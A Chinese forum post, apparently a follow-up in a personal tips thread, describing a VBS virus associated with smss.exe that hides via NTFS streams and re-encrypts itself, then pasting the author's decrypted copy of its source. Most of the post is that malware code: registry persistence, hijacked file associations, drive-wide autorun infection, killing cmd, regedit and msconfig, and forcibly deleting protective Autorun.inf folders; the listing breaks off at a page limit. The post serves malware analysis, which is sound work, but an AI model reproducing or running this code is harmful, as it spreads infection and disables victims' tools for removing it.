淘客熙熙

主题:个人经验总结帖,内容不定,不定期更新 -- 休眠火山

共:💬29 🌺73
全看分页树展 · 主题 跟帖
家园 关于smss.exe 后边是.vbs文件的病毒(续)

杀完了以后,下面讲讲这个病毒本身。这个病毒隐藏自身非常巧妙,它是利用了NTFS分区的流功能把自身附加到了系统程序的后边。这样就达到了只要启动系统就自动中毒的目的。

好吧,我承认我已经把这个病毒解密了。这个病毒实际上比较简单,为什么杀毒软件不认呢,是因为病毒每次传染的时候都要用新的随机码进行自我加密。vbs病毒有个致命缺陷,就是必须是明码运行,因此必须自我解密才能运行。这样我们可以通过解密来看到病毒的明码,并对病毒进行杀毒处理。

首先,我要表示一下失望,因为我以为这个病毒能够几层嵌套来加密,结果只有一层。

其次,试着贴病毒程序代码内容:

On Error Resume Next
Dim Fso,WshShell
Set Fso=CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")
Set WshShell=CreateObject("wScRipT.SHelL")
Call Main()
Sub Main()
 On Error Resume Next
 Dim Args, VirusLoad, VirusAss
 Set Args=WScript.Arguments
 VirusLoad=GetMainVirus(1)
 VirusAss=GetMainVirus(0)
 ArgNum=0
 Do While ArgNum < Args.Count
 Param=Param&" "&Args(ArgNum)
 ArgNum=ArgNum + 1
 Loop
SubParam=LCase(Right(Param, 3))
Select Case SubParam
Case "run"
RunPath=Left(WScript.ScriptFullName, 2)
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "txt", "log","ini" ,"inf"
RunPath="%SystemRoot%\system32\NOTEPAD.EXE "&Param
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "bat", "cmd"
RunPath="CMD /c echo Hi!I'm here!&pause"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "reg"
RunPath="regedit.exe "&""""&Trim(Param)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "chm"
RunPath="hh.exe "&""""&Trim(Param)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "hlp"
RunPath="winhlp32.exe "&""""&Trim(Param)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "dir"
RunPath=""""&Left(Trim(Param),Len(Trim(Param))-3)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "oie"
RunPath="""%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "omc"
RunPath="explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "emc"
RunPath="explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case Else
If PreDblInstance=True Then
WScript.Quit
End If
Timeout = Datediff("ww", GetInfectedDate, Date) - 12
If Timeout>0 And Month(Date) = Day(Date) Then
Call VirusAlert()
Call MakeJoke(CInt(Month(Date)))
End If
call MonitorSystem()
End Select
End Sub
Sub MonitorSystem()
On Error Resume Next
Dim ProcessNames, ExeFullNames
ProcessNames=Array("cmd.exe","cmd.com","regedit.exe","regedit.scr","regedit.pif","regedit.com","msconfig.exe")
VBSFullNames=Array(GetMainVirus(1))
Do
Call KillProcess(ProcessNames)
Call InvadeSystem(GetMainVirus(1),GetMainVirus(0))
Call KeepProcess(VBSFullNames)
WScript.Sleep 3000
Loop
End Sub
Sub InvadeSystem(VirusLoadPath,VirusAssPath)
On Error Resume Next
Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
Load_Value=""""&VirusLoadPath&""""
File_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" %1 %* "
IE_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OIE "
MyCpt_Value1="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OMC "
MyCpt_Value2="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" EMC "
HCULoad="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
HCUVer="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
HCUDate="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
VirusCode=GetCode(WScript.ScriptFullName)
Version=1
HostSourcePath=Fso.GetSpecialFolder(1)&"\Wscript.exe"
HostFilePath=Fso.GetSpecialFolder(0)&"\system\svchost.exe"
For Each Drive In Fso.Drives
If Drive.IsReady and (Drive.DriveType=1 Or Drive.DriveType=2 Or Drive.DriveType=3) Then
DiskVirusName=GetSerialNumber(Drive.DriveLetter)&".vbs"
Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)
Call InfectRoot(Drive.DriveLetter,DiskVirusName)
End If
Next
If FSO.FileExists(VirusAssPath)=False Or FSO.FileExists(VirusLoadPath)=False Or FSO.FileExists(HostFilePath)=False Or GetVersion()< Version Then
If GetFileSystemType(GetSystemDrive())="NTFS" Then
Call CreateFile(VirusCode,VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call CopyFile(HostSourcePath,HostFilePath)
Call SetHiddenAttr(HostFilePath)
Else
Call CreateFile(VirusCode, VirusAssPath)
Call SetHiddenAttr(VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call SetHiddenAttr(VirusLoadPath)
Call CopyFile(HostSourcePath, HostFilePath)
Call SetHiddenAttr(HostFilePath)
End If
End If
If ReadReg(HCULoad)<>Load_Value& Then
Call WriteReg (HCULoad, Load_Value, "")
End If
If GetVersion() < Version Then
Call WriteReg (HCUVer, Version, "")
End If
If GetInfectedDate() = "" Then
Call WriteReg (HCUDate, Date, "")
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>File_Value Then
Call SetTxtFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\")<>File_Value Then
Call SetIniFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\")<>File_Value Then
Call SetInfFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\")<>File_Value Then
Call SetBatFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\")<>File_Value Then
Call SetCmdFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>File_Value Then
Call SetRegFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>File_Value Then
Call SetchmFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>File_Value Then
Call SethlpFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\")<>IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\")<>IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\")<>MyCpt_Value1 Then
Call SetMyComputerAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\")<>MyCpt_Value2 Then
Call SetMyComputerAss(VirusAssPath)
End If
Call RegSet()
End Sub
Sub CopyFile(source, pathf)
On Error Resume Next
If FSO.FileExists(pathf) Then
FSO.DeleteFile pathf , True
End If
FSO.CopyFile source, pathf
End Sub
Sub CreateFile(code, pathf)
On Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText=FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText=FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
Sub CreateFile(code, pathf)
On Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText=FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText=FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
Sub RegSet()
On Error Resume Next
Dim RegPath1 , RegPath2, RegPath3, RegPath4
RegPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"
RegPath2="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
RegPath3="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
RegPath4="HKEY_CLASSES_ROOT\lnkfile\IsShortcut"
Call WriteReg (RegPath1, 3, "REG_DWORD")
Call WriteReg (RegPath2, 2, "REG_DWORD")
Call WriteReg (RegPath3, 0, "REG_DWORD")
Call DeleteReg (RegPath4)
End Sub
Sub KillProcess(ProcessNames)
On Error Resume Next
Set WMIService=GetObject("winmgmts:\\.\root\cimv2")
For Each ProcessName in ProcessNames 
Set ProcessList=WMIService.execquery(" Select * From win32_process where name ='"&ProcessName&"' ")
For Each Process in ProcessList
IntReturn=Process.terminate
If intReturn<>0 Then
WshShell.Run "CMD /c ntsd -c q -p "&Process.Handle, vbHide, False
End If
Next
Next
End Sub
Sub KillImmunity(D)
On Error Resume Next
ImmunityFolder=D&":\Autorun.inf"
If Fso.FolderExists(ImmunityFolder) Then
WshSHell.Run ("CMD /C CACLS "& """"&ImmunityFolder&"""" &" /t /e /c /g everyone:f"),vbHide,True
WshSHell.Run ("CMD /C RD /S /Q "& ImmunityFolder), vbHide, True
End If
End Sub
Sub KeepProcess(VBSFullNames)
On Error Resume Next
For Each VBSFullName in VBSFullNames 
If VBSProcessCount(VBSFullName) < 2 then
Run("%SystemRoot%\system\svchost.exe "&VBSFullName)
End If
Next
End Sub
Function GetSystemDrive()
GetSystemDrive=Left(Fso.GetSpecialFolder(0),2)
End Function
Function GetFileSystemType(Drive)
Set d=FSO.GetDrive(Drive)
GetFileSystemType=d.FileSystem
End Function
Function ReadReg(strkey)
Dim tmps
Set tmps=CreateObject("WScript.Shell")
ReadReg=tmps.RegRead(strkey)
Set tmps=Nothing
End Function
Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps=CreateObject("WScript.Shell")
If vtype="" Then
tmps.RegWrite strkey, Value
Else
tmps.RegWrite strkey, Value, vtype
End If
Set tmps=Nothing
End Sub
Sub DeleteReg(strkey)
Dim tmps
Set tmps=CreateObject("WScript.Shell")
tmps.RegDelete strkey
Set tmps=Nothing
End Sub

字数限制,必须分页了。

全看分页树展 · 主题 跟帖


有趣有益,互惠互利;开阔视野,博采众长。
虚拟的网络,真实的人。天南地北客,相逢皆朋友

Copyright © cchere 西西河